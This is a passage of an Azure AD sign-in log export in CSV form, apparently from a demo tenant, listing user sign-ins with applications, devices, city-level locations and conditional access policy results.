0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3a4d127f-5a89-4252-9f54-d79d86fe1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3a4d127f-5a89-4252-9f54-d79d86fe1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1985,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:47.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",273e63f4-458f-4455-8ca9-7b100b002e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,273e63f4-458f-4455-8ca9-7b100b002e00,SigninLogs,Sucess,51.4458313,-0.969720006
+1986,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:47.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,64377d85-3321-4480-a098-f0aed15f13a9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41b70c69-9711-4381-8dc3-5fd6f99b1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,41b70c69-9711-4381-8dc3-5fd6f99b1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1987,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:46.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4481185e-733c-479a-8afe-6f593c485f5e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc093610f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,dfda3bbc-b55b-4a89-a1fb-2fc093610f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1988,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:30.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc3fc2da-1cb4-4601-b915-2dccc59d9d4f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8d371308-4e1f-476f-97d6-c0ea79661300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,8d371308-4e1f-476f-97d6-c0ea79661300,SigninLogs,Sucess,41.90428925,-85.99833679
+1989,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:33.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d4eead83-9955-4d5d-9cac-c2fcebdaafd9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a052e7e-2284-4115-9ddd-003f41061200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,5a052e7e-2284-4115-9ddd-003f41061200,SigninLogs,Sucess,50.6406517,5.572050095
+1990,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:34.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,70c6cc5f-bf5b-4d2a-8a37-a6af696d5822,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f8484b51100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ec85dd07-c5e8-494c-aa5b-3f8484b51100,SigninLogs,Sucess,33.7984581,-84.38828278
+1991,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:22.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6e7d6438-c723-4a07-8639-2d6c773df078,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Yammer,00000005-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",7ad10e9e-8b94-4b07-9307-1c3215ab1100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Yammer,7ad10e9e-8b94-4b07-9307-1c3215ab1100,SigninLogs,Sucess,50.6406517,5.572050095
+1992,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:58.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0726ec53-50df-4f89-8a9b-4f247754c7b0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 